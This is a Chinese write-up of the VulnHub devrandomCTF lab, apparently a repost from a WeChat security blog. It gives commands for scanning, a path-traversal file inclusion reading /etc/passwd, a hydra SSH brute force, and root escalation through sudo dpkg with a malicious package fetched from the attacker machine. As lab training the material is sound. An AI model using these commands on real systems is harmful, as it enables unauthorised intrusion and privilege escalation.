vulnhub之devrandomCTF的实践

admin 2023年7月3日09:04:30评论39 views字数 904阅读3分0秒阅读模式

今天实践的是vulnhub的devrandomCTF镜像,

下载地址,https://download.vulnhub.com/devrandomctf/devrandomCTF-v1.1.ova,

无法用workstation导入,用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址192.168.0.188,

vulnhub之devrandomCTF的实践

继续进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.188,

vulnhub之devrandomCTF的实践

有web服务,并且web服务有个/?include=info的url,

猜测此处有文件包含漏洞,验证一下,浏览器访问,

http://192.168.0.188/?include=../../../../../../../../../etc/passwd,

vulnhub之devrandomCTF的实践

获取到一个账户,trevor,

用hydra对这个账户进行密码暴力破解,

hydra -l trevor -P /usr/share/wordlists/rockyou.txt 192.168.0.188 ssh,

vulnhub之devrandomCTF的实践

获取到密码qwertyuiop[],

ssh登录,ssh [email protected]

不是root,需要提权,

sudo -l确认到dpkg有root权限,

vulnhub之devrandomCTF的实践

去GTFOBins搜漏洞利用方法,

vulnhub之devrandomCTF的实践

kali攻击机上安装fpm,sudo gem install fpm,

TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

生成了x_1.0_all.deb,

kali攻击机上开个http下载服务,python2 -m SimpleHTTPServer,

在靶机上进入临时可写目录,cd /tmp,

下载文件,wget http://192.168.0.190:8000/x_1.0_all.deb,

执行,sudo dpkg -i x_1.0_all.deb,获取到新shell,id确认是root,

vulnhub之devrandomCTF的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之devrandomCTF的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月3日09:04:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之devrandomCTF的实践https://cn-sec.com/archives/1851159.html

发表评论

匿名网友 填写信息